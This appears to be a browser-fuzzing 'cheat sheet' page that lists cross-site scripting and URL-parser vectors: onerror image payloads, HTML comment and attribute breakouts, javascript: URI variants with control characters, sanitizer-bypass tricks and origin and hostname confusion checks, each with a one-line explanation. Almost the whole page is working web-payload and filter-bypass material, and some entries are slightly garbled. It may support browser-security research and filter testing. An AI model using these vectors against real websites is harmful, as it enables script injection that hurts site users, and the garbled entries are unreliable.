Cheat Sheet
Generated payloads from fuzz test results.
Found 174 vectors with results
char = String.fromCodePoint(60)
url = "javascript://google.com"+char
try {
  new URL(url)
}
catch(e){
  anchor.href=url
  if(anchor.protocol !== ':'){alert(60)}
}

char = String.fromCodePoint(62)
url = "javascript://google.com"+char
try {
  new URL(url)
}
catch(e){
  anchor.href=url
  if(anchor.protocol !== ':'){alert(62)}
}

char = String.fromCodePoint(64)
url = "javascript://google.com"+char
try {
  new URL(url)
}
catch(e){
  anchor.href=url
  if(anchor.protocol !== ':'){alert(64)}
}

char = String.fromCodePoint(91)
url = "javascript://google.com"+char
try {
  new URL(url)
}
catch(e){
  anchor.href=url
  if(anchor.protocol !== ':'){alert(91)}
}

char = String.fromCodePoint(92)
url = "javascript://google.com"+char
try {
  new URL(url)
}
catch(e){
  anchor.href=url
  if(anchor.protocol !== ':'){alert(92)}
}

try { v = "javasc$ript$:(1)"; if (eval(v)) { console.alert(v); alert('36') } } catch(e) { v = '' }
Find what characters are allowable inside `javascript` in `eval` (redundant much?)

try { v = "javasc_ript_:(1)"; if (eval(v)) { console.alert(v); alert('95') } } catch(e) { v = '' }
Find what characters are allowable inside `javascript` in `eval` (redundant much?)

try { v = "javascªriptª:(1)"; if (eval(v)) { console.alert(v); alert('170') } } catch(e) { v = '' }
Find what characters are allowable inside `javascript` in `eval` (redundant much?)

try { v = "javascµriptµ:(1)"; if (eval(v)) { console.alert(v); alert('181') } } catch(e) { v = '' }
Find what characters are allowable inside `javascript` in `eval` (redundant much?)

<img src=x onerror0x09=alert(9)>
I want to know which characters the browser accepts between an event handler and an equal sign.

<img src=x onerror0x0C=alert(12)>
I want to know which characters the browser accepts between an event handler and an equal sign.

<img src=x onerror0x0D=alert(13)>
I want to know which characters the browser accepts between an event handler and an equal sign.

<a href="javascript0x09:" id=x></a>
This tests for chars allowed before the colon in a JavaScript URI format.

<a href="javascript
:" id=x></a>

<a href="javascript0x0D:" id=x></a>
This tests for chars allowed before the colon in a JavaScript URI format.

<a href="javascript::" id=x></a>

if (new URL("https://example.com" + String.fromCodePoint(0)).hostname === 'example.com'){alert(0)}
Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"

if (new URL("https://example.com" + String.fromCodePoint(1)).hostname === 'example.com'){alert(1)}
Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"

if (new URL("https://example.com" + String.fromCodePoint(2)).hostname === 'example.com'){alert(2)}
Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"

if (new URL("https://example.com" + String.fromCodePoint(3)).hostname === 'example.com'){alert(3)}
Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"

if (new URL("https://example.com" + String.fromCodePoint(4)).hostname === 'example.com'){alert(4)}
Checks what characters can be added at the end of "https://example.com", while keeping the hostname "example.com"

<! <a/b="--><img/src/onerror=alert(1)>"
This vector shows which characters can be used after the "<" character and act as an HTML comment

</ <a/b="--><img/src/onerror=alert(1)>"
This vector shows which characters can be used after the "<" character and act as an HTML comment

<? <a/b="--><img/src/onerror=alert(1)>"
This vector shows which characters can be used after the "<" character and act as an HTML comment

if (new URL("https://google.com0x090x09/endpoint").origin=="https://google.com"){alert(9)}
Characters ignored in a URL that yield the same origin

if (new URL("https://google.com##/endpoint").origin=="https://google.com"){alert(35)}

if (new URL("https://google.com///endpoint").origin=="https://google.com"){alert(47)}

if (new URL("https://google.com??/endpoint").origin=="https://google.com"){alert(63)}

if (new URL("https://google.com\\/endpoint").origin=="https://google.com"){alert(92)}

<p><img/src/onerror=alert(1)></p>
Looking for potentially a way to bypass the removal of < tags. (Assume the <p> tags are being returned by the application.)

if (new URL("javascript0x09:alert()").protocol=="javascript:"){alert(9)}
Vector to check if any characters are allowed between javascript and : to still result in a javascript url.

if (new URL("javascript::alert()").protocol=="javascript:"){alert(58)}
Vector to check if any characters are allowed between javascript and : to still result in a javascript url.

if (new URL("javascript\:alert()").protocol=="javascript:"){alert(92)}
Vector to check if any characters are allowed between javascript and : to still result in a javascript url.

This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes

<input id="test" value="s0x00onload="alert(1)" />
Characters that can break out of an inline value with double quotes

if (['https:'].includes("\https:")){
  alert(92)
}
Check for chars allowed before the string to validate.

Characters that can replace the opening angle bracket and still form a valid HTML element

<img src=x><img/src/onerror=alert(1)>
Characters that can be used to close or encapsulate HTML attribute values.

<!----!>><img/src/onerror=alert(1)>

if (new URL("https://0x09localhost/endpoint").host == "localhost") {
  alert(9);
}
This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".

if (new URL("https:///localhost/endpoint").host == "localhost") {
  alert(47);
}
This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".

if (new URL("https://@localhost/endpoint").host == "localhost") {
  alert(64);
}
This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".

if (new URL("https://\localhost/endpoint").host == "localhost") {
  alert(92);
}
This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".

if (new URL("https://localhost/endpoint").host == "localhost") {0x0D
  alert(173);
}
This vector will test what characters can be inserted between the protocol separator (//) and the domain (localhost) in a URL (e.g., https://{X}localhost/endpoint) while still allowing the browser to resolve the host property as "localhost".